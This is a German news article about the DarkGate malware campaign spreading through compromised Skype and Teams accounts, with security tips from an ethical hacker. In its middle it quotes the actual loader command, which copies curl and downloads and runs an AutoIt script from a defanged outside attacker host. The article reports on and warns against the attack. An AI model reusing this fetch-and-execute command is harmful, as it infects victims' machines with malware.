Der Zugriff auf das Skype-Konto ermöglicht den Hackern, einen bestehenden Nachrichten-Thread zu kapern und die Dateien so zu benennen, dass sie zum Kontext des Chat-Verlaufs passen. Das ist sehr gefährlich. 

Was sich die Betroffenen auf ihren PC herunterladen, ist auf den ersten Blick somit nicht unbedingt zu erkennen.

Nicht alle Virenschutzprogramme erkennen diesen Angriff und so kann in kurzer Zeit eine Vielzahl von Rechnern / Handys infiziert werden, so Hacker Ralf Schmitz. 

So verbreitet sich diese Malware

Diesmal heißt die Malware  „DarkGate“ und verbreitet sich derzeit über Skype- und Teams-Konten.

Hacker verteilen Malware über Microsoft Teams und Skype

Die Masche dieser Malware ist diesmal besonders tückisch. Die Hacker versenden Nachrichten mit VBA-Loader-Skript-Anhängen, so z. B.

C:\Windows\System32\cmd.exe“ /c mkdir c:\zohn & cd /dc:\zohn & copy C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3.exe hxxp:/ /reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3  

um die PCs ihrer Opfer mit der Schadsoftware zu infizieren.

Bestehende Nachrichtenverläufe werden nachgestellt und die Namen der Dateien so gestaltet, dass sie dem Kontext des Chatverlaufs entsprechen, schreibt dazu TrendMicro eine Sicherheitsfirma. 

Die Vorsichtsmaßnahme, nur Dateien von bekannten Kontakten anzunehmen, hilft also bei „DarkGate“ wenig. 

Ein großes Datenleck könnte dahinterstecken!

Es ist zur Zeit noch unklar, wie die Konten der Anwendungen kompromittiert wurden.

Es wird jedoch vermutet, dass dies entweder durch durchgesickerte Zugangsdaten in Untergrundforen oder durch die vorherige Kompromittierung der Mutterorganisation geschah.

Sicherheitstipp von Ethical-Hacker Ralf Schmitz!

Skype- und Teams-Nutzer*innen rät Ralf Schmitz ihre Sicherheitssoftware und Antivirenprogramme immer zu aktualisieren und auch wöchentliche Prüfungen auf Handy, PC, Tablet durchzuführen, um Schadsoftware auf den eigenen Geräten frühzeitig zu erkennen.

Auch Sicherheitsvorträge die solche Angriffe live einmal zeigen und die Ralf Schmitz regelmäßig in Deutschland anbietet, können die Sicherheit erhöhen.  

Auch Virenschutzsoftware von verschiedenen Herstellern, können helfen. Diese darf aber nicht zeitgleich auf allen Geräten ausgeführt werden.

Wenn  Opfer die präparierte Datei angeklickt haben, löst dies den Download und die Ausführung eines AutoIT-Skripts zum Starten der DarkGate-Malware aus. Der Hacker hat nach der erfolgreichen Installation der Malware dann mehrere Optionen.

So ließen sich Informationen stehlen und die Systeme mit verschiedenen Arten von Schadsoftware infizieren, darunter Ransomware, bösartige Fernsteuerungs-Tools und Crypto-Miner.

Außerdem wird gerade beobachtet, dass die Angreifer versuchten, die DarkGate-Malware via Microsoft Teams in Unternehmen und Finanzinstitute einzuschleusen, die den Dienst so konfiguriert haben, dass er Nachrichten von externen Usern akzeptiert. Dabei sendeten die Kriminellen ZIP-Archive mit einer LNK-Datei, die dazu dient, ein VBA-Skript auszuführen.

Das wichtigste Mittel, um Hackerangriffe zu verhindern, ist eine Menge Erfahrung im Netz und Sicherheitssoftware, um solche perfiden Angriffe zu verhindern.